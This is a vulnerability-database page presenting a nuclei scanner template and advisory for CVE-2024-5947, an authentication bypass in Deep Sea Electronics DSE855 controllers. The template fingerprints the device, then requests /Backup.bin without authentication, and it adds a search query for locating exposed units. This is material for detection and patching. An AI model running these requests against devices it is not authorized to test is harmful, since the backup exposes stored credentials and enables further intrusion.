Lucene search
K

Deep Sea Electronics DSE855 - Authentication Bypass

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 43 Views

Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices

Related
Refs
Code
id: CVE-2024-5947

info:
  name: Deep Sea Electronics DSE855 - Authentication Bypass
  author: s4e-io
  severity: medium
  description: |
    Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.
  impact: |
    Unauthenticated network-adjacent attackers can download configuration backup files containing stored credentials without authentication.
  remediation: |
    Contact Deep Sea Electronics for a firmware update that addresses the authentication bypass vulnerability in DSE855 devices.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5947
    - https://packetstormsecurity.com/files/179342/Deep-Sea-Electronics-DSE855-Remote-Authentication-Bypass.html
    - https://www.zerodayinitiative.com/advisories/ZDI-24-671/
  classification:
    epss-score: 0.02418
    epss-percentile: 0.82141
  metadata:
    verified: "true"
    max-request: 1
    vendor: Deep Sea Electronics
    product: DSE855
    fofa-query: "Deep Sea Electronics"
  tags: packetstorm,cve,cve2024,bypass,info-leak,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"Copyright Deep Sea Electronics")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /Backup.bin HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"Unknown")'
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450220551b95d37caf1771491d8606301f3de48c207d098e106efb69f0c35ea0ad3c6b02210091c6a9107d6b49ca3a5aa3eeb6b4796963e3d90a9d8ccb4e9a24534778eb5143:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.16.5
CVSS 36.5
EPSS0.02418
SSVC
43